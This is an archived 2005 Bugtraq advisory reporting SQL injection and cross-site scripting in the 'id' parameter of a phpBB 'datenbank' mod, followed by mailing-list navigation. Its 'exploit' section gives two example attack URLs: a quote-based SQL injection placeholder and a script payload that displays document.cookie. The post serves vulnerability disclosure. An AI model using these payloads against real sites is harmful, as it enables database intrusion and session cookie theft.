phpBB datenbank mod has XSS/SQL Injection in the id variable

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: phpBB datenbank mod has XSS/SQL Injection in the id variable
From: tom cruise <the.n3t@xxxxxxxxx>
Date: 16 Apr 2005 08:30:46 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm


vulnerable mod:
datenbank

explaination:
you can pass SQL Injection / Cross Site Scripting (Commands) in the id variable 
inside the mod.php (mod-datenbank)

exploit:
http://[target]/phpBB/moddb/mod.php?id='[SQL Injection]
http://[target]/phpBB/moddb/mod.php?id='>&lt;script&gt;alert(document.cookie)
&lt;/script&gt;

this bugs discovered by : neO
SGT SecurityGurus Team 
www.securitygurus.net

Prev by Date: Re: Http Response Splitting Vulnerability In PHP-NUKE 7.6 and below
Next by Date: Re: gzip TOCTOU file-permissions vulnerability
Previous by thread: [DR001] AppleWebKit XMLHttpRequest arbitrary file disclosure vulnerability
Next by thread: Require many large corporate emails for contact regarding vulnerability.
Index(es):
- Date
- Thread